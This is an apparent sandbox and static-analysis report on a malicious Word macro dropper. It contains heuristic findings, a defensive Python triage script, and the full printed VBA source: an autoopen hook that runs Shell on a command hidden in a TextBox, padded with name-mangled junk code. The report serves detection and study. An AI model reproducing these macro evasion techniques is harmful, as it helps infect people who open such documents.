Verdict: MALICIOUS
Risk Score: 252
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including an autoopen procedure, the standard initial-execution hook for malicious Word documents: it runs as soon as the document is opened and the user enables content. The critical OLE_VBA_SHELL heuristic matched a call to Interaction.Shell(). In the source the object name and the .Shell method are separated by seven bare line-continuation lines, so the qualified name never appears on a single physical line. The first argument to Shell, ojzFsSicpE, is assembled from JSutzbIDItO.TextBox1 (an MSForms text box on the document module) plus ten variables that appear nowhere else in the module and are therefore Empty at run time; the command string itself is stored in the form control, not in the macro code, and a source dump alone will not show it. SC_STR_CMD reports a cmd.exe invocation with an execution flag, which together with the Shell call indicates the macro runs a command-line one-liner, most likely to download and execute a second-stage payload. That is consistent with the ClamAV dropper classification (Doc.Dropper.Sload-6782040-0). The remaining statements (Sqr, Oct, ChrW and long arithmetic on undefined variables, with Set on undefined objects swallowed by On Error Resume Next) are junk-code padding with no effect.
Heuristics (9)

- ClamAV: Doc.Dropper.Sload-6782040-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Dropper.Sload-6782040-0.
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings). Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script:
  _ .Shell(ojzFsSicpE, jwNVZllmPbP), rSpFiYo) Set zJRfwpGovPDPBipkBuOaQB = JNzwaQwBWstXJBn
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. For this sample the decoded source was recovered (macros.bas), so the p-code finding corroborates the source-level autoopen and Shell findings rather than standing in for them.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script:
  Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() TGZDNSvsS
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD). The cmd.exe string does not occur in the decoded macro source shown in the preview; the Shell() argument ojzFsSicpE is built at run time from the TextBox1 form control, so this match most likely comes from a stream other than the decoded source (the stored control value or the p-code strings).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this canned description conflicts with the artifact list for this sample, which does include a recovered VBA project; treat the marker as redundant with OLE_VBA_AUTOOPEN here.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier carried by any Office document that contains drawing markup; it is not a network indicator and is not worth blocking or hunting.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8026 bytes |

SHA-256: 8ae7614a70e4b56965d34658cd9e2917ed5269e8757cd938228ba7f064653d32

Detection (this artifact), ClamAV: No threats found. The Doc.Dropper.Sload-6782040-0 signature listed under Heuristics fired on the parent document, not on the decoded macro text.

Obfuscation or payload: likely. 220 of 258 identifiers look randomly generated (e.g. 'inKCqCNXzDYlzQunlDcFMoNj'), consistent with name-mangling obfuscation.
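As an added example (not the analyzer's code and not the sample author's), the Python script below implements the checks behind the OLE_VBA_AUTOOPEN, OLE_VBA_SHELL and name-mangling findings on a VBA module, and traces the Shell() argument back to the TextBox1 form control that the summary describes. The SAMPLE_VBA text is constructed, condensed from the macros.bas preview; the detection regexes and the "mangled identifier" rule (two lower-to-upper case flips, or a consonant run of four or more) are this example's own assumptions, not the analyzer's actual heuristics.

```python
"""Static triage of an extracted VBA module, modelled on this report's findings:
fold line continuations, flag auto-exec entry points and Shell() calls, trace the
Shell() argument to where it is built, and score identifier name-mangling."""
import re
from typing import Dict, List, Tuple

# Constructed sample condensed from the macros.bas preview: autoopen hook,
# Interaction.Shell split across bare '_' lines, command taken from a TextBox.
SAMPLE_VBA = '''Attribute VB_Name = "JSutzbIDItO"
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
TGZDNSvsS
End Sub
Function TGZDNSvsS()
On Error Resume Next
Const jwNVZllmPbP = 0
ojzFsSicpE = JSutzbIDItO.TextBox1 + kjibjj + zPjfQTW
wYYUGPZpA = Array(btYLcDq, XNjNUPQm, TDMbpOk, Interaction _
_
_
.Shell(ojzFsSicpE, jwNVZllmPbP), rSpFiYo)
End Function
'''

AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(autoopen|auto_open|autoexec|"
    r"autoclose|document_open|document_close|workbook_open)\b", re.IGNORECASE)
# Shell() (bare or qualified as VBA./Interaction.), shell COM objects, cmd/powershell.
SHELL_RE = re.compile(
    r"(?:\b(?:VBA|Interaction)\s*\.\s*)?\bShell\s*\(|"
    r"CreateObject\s*\(\s*\"(?:WScript\.Shell|Shell\.Application)\"|"
    r"\bcmd(?:\.exe)?\b|\bpowershell\b", re.IGNORECASE)
VBA_KEYWORDS = {"attribute", "sub", "function", "end", "on", "error", "resume", "next",
                "const", "set", "dim", "as", "array", "shell", "interaction", "vba",
                "public", "private", "true", "false", "if", "then", "else", "for", "to"}
IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
STRING_RE = re.compile(r'"[^"]*"')


def join_continuations(src: str) -> List[str]:
    """Fold VBA continuations (trailing ' _' or a bare '_' line) into logical lines,
    so 'Interaction _' / '_' / '.Shell(' is seen as one Interaction.Shell( call."""
    logical, buf = [], ""
    for raw in src.splitlines():
        line = raw.rstrip()
        if line == "_" or line.endswith(" _"):
            buf += line[:-1]        # drop the underscore, keep accumulating
            continue
        logical.append(re.sub(r"\s+\.", ".", buf + line))  # 'Interaction .Shell' -> 'Interaction.Shell'
        buf = ""
    if buf:
        logical.append(buf)
    return logical


def find_autoexec(lines: List[str]) -> List[str]:
    """Names of auto-executing procedures (what OLE_VBA_AUTOOPEN keys on)."""
    return [m.group(1) for line in lines if (m := AUTOEXEC_RE.match(line))]


def find_shell_calls(lines: List[str]) -> List[Tuple[int, str]]:
    """(1-based logical line, matched text) for every shell-style token."""
    return [(i, m.group(0)) for i, line in enumerate(lines, 1) for m in SHELL_RE.finditer(line)]


def trace_shell_argument(lines: List[str]) -> Dict[str, object]:
    """First argument of the first Shell(...) call and the statement assigning it.
    from_form_control=True means the command text lives in an MSForms control
    (Module.TextBoxN etc.), not in the macro source, so a source dump will not show it."""
    hit = next((m for line in lines if (m := re.search(r"\bShell\s*\(\s*([A-Za-z_]\w*)", line))), None)
    if hit is None:
        return {"shell_found": False}
    arg = hit.group(1)
    assign = re.compile(r"^\s*" + re.escape(arg) + r"\s*=\s*(.+)$", re.IGNORECASE)
    rhs = next((a.group(1) for line in lines if (a := assign.match(line))), None)
    controls = re.findall(r"\b\w+\.(TextBox\d*|Label\d*|Caption)\b", rhs or "")
    return {"shell_found": True, "argument": arg, "rhs": rhs,
            "from_form_control": bool(controls), "controls": controls}


def looks_mangled(name: str) -> bool:
    """Generated names flip lower->upper case mid-word several times or carry long
    consonant runs; real names (TextBox1, autoopen, VB_Name) do neither. Assumed rule."""
    if len(name) < 6 or name.lower() in VBA_KEYWORDS:
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.islower() and b.isupper())
    longest_run = max((len(r) for r in re.findall(r"[b-df-hj-np-tv-z]+", name, re.I)), default=0)
    return flips >= 2 or longest_run >= 4


def mangling_ratio(lines: List[str]) -> Tuple[int, int]:
    """(mangled, total) over unique non-keyword identifiers with string literals
    blanked; the report's '220 of 258 identifiers' is this kind of figure."""
    code = STRING_RE.sub('""', "\n".join(lines))
    idents = {t for t in IDENT_RE.findall(code) if t.lower() not in VBA_KEYWORDS}
    return sum(looks_mangled(t) for t in idents), len(idents)


def triage(src: str) -> Dict[str, object]:
    """Run every check over raw module text and return the report-style fields."""
    lines = join_continuations(src)
    mangled, total = mangling_ratio(lines)
    return {"autoexec": find_autoexec(lines), "shell_calls": find_shell_calls(lines),
            "shell_argument": trace_shell_argument(lines),
            "mangled_identifiers": f"{mangled} of {total}"}
```

On the constructed sample, triage(SAMPLE_VBA) reports autoexec ['autoopen'], a Shell call on logical line 10 matched as Interaction.Shell( (a bare-line signature would see only .Shell( with no object name), from_form_control=True with controls ['TextBox1'], and 10 of 15 identifiers mangled. The practical consequence is the same as for the real sample: the command string has to be recovered from the document's stored control value (for example with olevba's form-string extraction), not from the VBA source.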
Preview script (first 1,000 lines of the extracted script; the whole 115-line module fits, so this is the complete decoded source). Two modules are concatenated: the document module JSutzbIDItO (ThisDocument, holding autoopen) and the standard module TGrdRnCLv (holding TGZDNSvsS).
Attribute VB_Name = "JSutzbIDItO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
TGZDNSvsS
End Sub
Attribute VB_Name = "TGrdRnCLv"
Function TGZDNSvsS()
On Error Resume Next
Set XrzwqNfbbDchPciPZEH = CJQZWMwwhjVAwuYfMSjIqMp
HqDrsmlnZGZObYbdOhtvhb = Sqr(UEzDHXwCqTdSjJGFvuibpV)
DoqDtJSuFfEjnsji = 102704773 * Oct(EiuwFvUIbwAzAwztwPQ) * 133704653 * tXYYmcZTMMQSAkm - (104232035 + CLng(ivilhUuFiHktwTO) * 311342474 * CBool(137072830))
LVaTTuoPlkjzMMiq = ChrW(UlULDiSHUpZPsBXjYbufO)
Set HNfYTDXDcihSobQ = ImftUALcGnWOianE
navoOSjoOQQqbfsdQQffQl = Sqr(CCSfjJVCucdBBUX)
UzFGkvmfHilRJIZYCTslwmz = 203881114 * Oct(NWNzirItXLfKfWHQnXBXDtl) * 22836507 * zhcmwhzaMWZYhdn - (193100175 + CLng(lztNWwlUIPwHpUkKsfJ) * 211944424 * CBool(46654792))
djjSzhsFuOufHnKrclq = ChrW(nSBTXCoNpwizRLTMi)
Set vUjCZdFNLzWYwHFaMGcwn = SjrOqYSipjrPqkEzMSp
nKLIHRvtbiKZwTC = Sqr(KLnjvcJnjhQUWMtJJjoHXjGZ)
YGGYRSXiGoBfILKAYbaB = 182501688 * Oct(OoBQQiuabEODWWCOPO) * 299221962 * QYsdAUiHzHjXBBrSXBCso - (208896351 + CLng(zRFoozJMLHqHqwXP) * 315498890 * CBool(341841230))
bTXqCVikqNMBwkLvLvfqJp = ChrW(VQKtBWzmGsBEsZbCTJNSzwG)
Set jtkjhNuYslYUthkp = AjXRNptYFnFAwWtIuU
HKJArLriKRTRjj = Sqr(abzwTEqHcZoYwOfLwMiiK)
jjFWGiHlWYQMwRJwBwQCjaC = 257234745 * Oct(TfFUEwBZivSqzzHAqDQHkSN) * 12134179 * LjRHKFiSbnDBQR - (171603308 + CLng(nNVrHEBICpXlfKARE) * 133780974 * CBool(296627109))
kRYqnXVJEwZlqswFr = ChrW(sHiIFUhsnQnlzwYL)
Set LEVnjDJlWIziUlCnYQYmdNm = NnXKzMzjBiHwHZwKR
pwJuWSzRXjcQOzSCZsfz = Sqr(KKQcqdFfzSOUwYnJSREKio)
HkPKiFAGiStiotRjp = 299295414 * Oct(YNNvQYitGaboDWtIraSba) * 335126733 * jCEtzPAlPRwPDtoz - (248301197 + CLng(LtfDdpIukaFWSL) * 168949993 * CBool(13204557))
tLffdGpLXHGpPCbhaOFj = ChrW(YOlEiajszkqBPvnGVhnp)
Set zKwmZzQwQcCofjD = BOOKiHBRcAipmX
QzOpbqwXSpQZOKzP = Sqr(DaWuTDarJhJYVaJsRm)
RtcKCqwURimGdkHmMBRzvn = 328035471 * Oct(JpzzPGjzXLwcbPTDW) * 232616504 * JXajoNozrApsdvK - (6741087 + CLng(rzELCoiRmiKwhNaM) * 202681903 * CBool(267910673))
jJKjbJoziSVjQOGMXizGirO = ChrW(idAKmPjwHQREjP)
Set nOOpVPYrDPRZdYco = HdqHOupKNrjUKU
JGJpzwfonwpfcJYHPoNMNSF = Sqr(UYiIYsWtvYQWOmrEcoC)
YONBpjRfzIfqAkVY = 117150466 * Oct(QvZwkEtBsczIjYPuAF) * 72880178 * SoaqvmsZWiRSmFXHmbiJ - (50588119 + CLng(roioYGbGjPNoEcUiAzLTiN) * 74875458 * CBool(203083354))
iBIIZbCVizmIHOmwQv = ChrW(EwBvmDahznJddD)
Set MuiHfYiLmQVPpOlPBiKCRL = pbHPQitIjfwNKwKLPjU
jnnNoVXUBFZYBUsjYISctImj = Sqr(AbRrTvSwOrCntauKYGdGZMq)
imGRrDaBDVouGdi = 65450382 * Oct(bmdqsiiXRUBIdSo) * 242339545 * MjpAFLQBjYmAEuXT - (341673972 + CLng(ZNOlHYuaiYsaDzJuRBUGWaMp) * 57114362 * CBool(44955289))
XNZdodUOXzbZQGfdrIIUmqJd = ChrW(ztazAYdAcXMJvDzjlm)
Const jwNVZllmPbP = 0
Set kjQokPPAHILatjr = ZTJIBOoKLZwCRYBwKEDi
fAVaGhKnCosHwjWQn = Sqr(VrGcKSMijHOQocM)
uSohvhiWJlEvTrfj = 149505369 * Oct(inKCqCNXzDYlzQunlDcFMoNj) * 128431753 * ORPrbhtruZAsclTXjaz - (152827952 + CLng(nAfGbERktZaiRowHFbrsI) * 146148176 * CBool(134825800))
taqloFmlwoaQjlAccHAAZJ = ChrW(wXQdwGfcRjsNANfw)
Set MfdlTRYMwJVREvhwczSqIGcM = LWfSQmBjNYLuNufmzObBQ
wLNutzlnFDREIvsuhWTi = Sqr(WVBOEmDIsAKQhZUFVtDzZTH)
JmkuFjEhimZpLjoLiiMC = 40746549 * Oct(bWXpMdPlRDOYERBIDLvdiu) * 337427465 * tpEsOvGEXVLOXPUbRzVW - (180885598 + CLng(bWJZaBGdFjWsvWYXWVzJAi) * 43860911 * CBool(256831703))
nqULkZcDGOiioUFzuQfri = ChrW(wDuazYSmsQWomKmRUG)
Set ihwYSuKTduRzwt = vHkDLaUDPspwhzjs
pSaSvjPbIpbvCj = Sqr(YaRmuYEdJdjfczdVzCQKi)
sAbVbCktHMMGYGjuzc = 245735345 * Oct(QoLAmdfTdtmWFFiRKZwBsP) * 144456878 * TWZXpCEoYpCEoajzXR - (104993627 + CLng(apBTXOjYfjvBSphPE) * 49815039 * CBool(196828156))
ozzPCidkqzdbzHwdVGz = ChrW(SjJotBlztTtQnoZcslQ)
Set BKfpDUmYchSzAiXCzQ = CDKScXiowdkSOdobltHnKD
cKfjHBCldRiOSqsCSYjqus = Sqr(DULDmJpcizOhHzoXn)
rGBkOWksqpOdNukwbOvzPco = 269564063 * Oct(PEIlFiBtwDmNTF) * 270680957 * tTANAlUzKVZbpiORM - (235369212 + CLng(RbHkLMkRqziHJGfVJobzikLa) * 237945035 * CBool(31813083))
ERoUBjHXrlioAQUdzbN = ChrW(UJIFdljUjQhAGmfzC)
Set UwPKXtzvqGtZIcuXoTh = niPjHuwuOpvstCX
hiKuvGoLOYNzubiLm = Sqr(nlijDduFhAKBjGEdpJJmM)
uDVjjzzmHkFIOmiBbhAq = 161849167 * Oct(BNsHuRlYCAYGriLTwuFuta) * 313749542 * rRvoibmWIHCHrYEiBii - (36683955 + CLng(IvDqHlFlduaRUPcVzqaNB) * 329055589 * CBool(236457250))
DcXpWtKsqnjWrzaqhli = ChrW(cqWJbMEsHsiKLbni)
Set MEzcRUVEQhzdIj = RwtIslMzBVtQiwrMMHO
NYnasKoBizMXFcPcbQr = Sqr(AFwHXEqHZVmWtJOtL)
PhzLVBJVKChOlwPwZ = 55656794 * Oct(jCoUhcIMpiwNWQIBJVp) * 234481140 * zCunaKkqGwkGTfQbNPiMpTrO - (267882106 + CLng(wcuGbkYdiAtjHRYV) * 234932558 * CBool(224888259))
HDksawFGWHiLjzPL = ChrW(vzUAhqzPhjHRoTj)
ojzFsSicpE = JSutzbIDItO.TextBox1 + kjibjj + zPjfQTW + GOOJoS + FYLQKvdR + duOpcViF + pUGOtY + wQmsb + MSrobZ + BEvQzdbI + MlnhXpkW
Set AjLNHnLaGkszPLXikVbIp = HAMTZrmNwfmQYbkikl
crnzwJWZpvbOtvjZLAnNUns = Sqr(MMwnwwFkqPNbUAOJCRzRW)
sUrCYizXZpzCmlLid = 281349286 * Oct(rYiiFEKmdKCpaOuUdwtabn) * 120799403 * XcROcwUoGcftOmlzNrTMXz - (159385981 + CLng(rRhmjQOEGoKcnwJfqNjwjB) * 36330970 * CBool(284627418))
vMkTFSYEiWLQiFqO = ChrW(nabJKQhoWJQZEqLqcnE)
Set vnccwDHiXNKqAqR = cPSkZWZVcIIbpWGQYS
HJzzFWBwUionclWLbzLjY = Sqr(GAovfoBGuRiHKNfP)
NXYErnUfqTKfQNmJ = 298515673 * Oct(wKJqNzOkWFUaIj) * 78520773 * zIAJPMUQpVqbdEwzRKiFCW - (72032472 + CLng(qGQOKPKdTiPiJknjqtA) * 289096166 * CBool(42637546))
GSJXJwwGjazZSIwFFaKNIz = ChrW(SnjXwOJVTUDAzFnFMfMuoj)
Set bjbaCIaFQMdtiuwnCrHARbaZ = jFTFVHlpiETzfOdJl
sMqSwkmLKPodAGBKTD = Sqr(zuFrEEpioXcdqjF)
MZRIiTKwVAAEMzVvZClbn = 137093643 * Oct(OGGwnhlwwuYpkCuYjkIVDD) * 248564133 * qChDnviurnCCcVXPk - (13269185 + CLng(JoIktfiFqiwjKU) * 263401386 * CBool(48695807))
AhLBPizwzsvLMtlBzcdiR = ChrW(YIqnPsEshoNmOCqCtJKnum)
Set iunOOcTIORHpnnKsas = zLKpAwsOMNGuqX
rrEZMvEvjKplmtwVbZPIIXE = Sqr(QWNGvHXQRvvTnAfGsPbfKM)
VOsiUbPjTmSJqiw = 2583226 * Oct(nZUrzihbuIPtwZbDQsr) * 21017684 * CoBLcjVqpYtOzrlsOXjK - (21420007 + CLng(TzpWMqGZpGzwkkSfVzM) * 239950761 * CBool(30636303))
WizhpKCUHsZcVBVFTikPi = ChrW(RAHBZiCmwSVkdLZfBvXVzE)
Set NKDCdLSAiswkpFK = mvAVaBcvjNcnaAdNCjPfnKKB
zIQZBTLIizwzHiM = Sqr(IWPiiZdOlhFpiJbkzMatL)
iuRirDfPuFCzfouTiZ = 202035208 * Oct(nTOViZVNwvDTWm) * 285781126 * RzhZjVmzmhinqfhBOJ - (223458296 + CLng(jvASiRRzCjbszZCi) * 290455587 * CBool(31386028))
RjOizviXSOCEMEjpV = ChrW(PrSEnzDFlpRdDIJqQiRMDXzt)
Set UUjCfBWolWEiMjCfFfNh = OFJsirOfkOsMBbkPiYNWVs
qCOornJYPDrGOaKBKHJBIMVK = Sqr(SQWHzLSVGSpPDXr)
pdJKVVpYWDOMrqihEjY = 155138719 * Oct(QPsYkHHUmHjRaSjMAmwawk) * 319504614 * GiQoIKWwUnYNQmkOiDkwfvRY - (309628877 + CLng(EtcwpjTwRGrSMbklzn) * 299499871 * CBool(142537153))
NCisuzARLMstoGdWXzsuUUiX = ChrW(rJMtzdiZYqruEujSf)
wYYUGPZpA = Array(btYLcDq, XNjNUPQm, TDMbpOk, Interaction _
_
_
_
_
_
_
_
.Shell(ojzFsSicpE, jwNVZllmPbP), rSpFiYo)
Set zJRfwpGovPDPBipkBuOaQB = JNzwaQwBWstXJBn
CFiBSRKmEUziwDbZzFISwqfY = Sqr(NjWHLfjOwMViAmsCNuGQPETQ)
ZEtUzLZJEEkoitpQUz = 285626741 * Oct(qwSPPjwZHhJNFnl) * 179023009 * tzBvYvhHOiBRAvGbKdcldE - (104414497 + CLng(zCWvXiqHNaawqLSBl) * 51928189 * CBool(11509922))
uIHmClvKIpMojl = ChrW(WYmkfstDaUIlwKbAVDPUrvks)
Set RwlpfSjXAunJVoFXc = GaUkATMlinrENzTMWvODjcvo
ztatKvaEKNLthwRcujvjw = Sqr(pqJRKJZPdijDAZmsYsQz)
jISpwwamsAIkSE = 236021255 * Oct(slRfvjjNizsqBLCPwiFiq) * 183585581 * NwdldYShVCIfGzUH - (342313868 + CLng(FLzDkkjzsoowBtQYEjR) * 333144210 * CBool(19704583))
LPXntjwQcXFGlQOJOtEfjd = ChrW(WBPOiunpBYQzjjwqABbMQsu)
End Function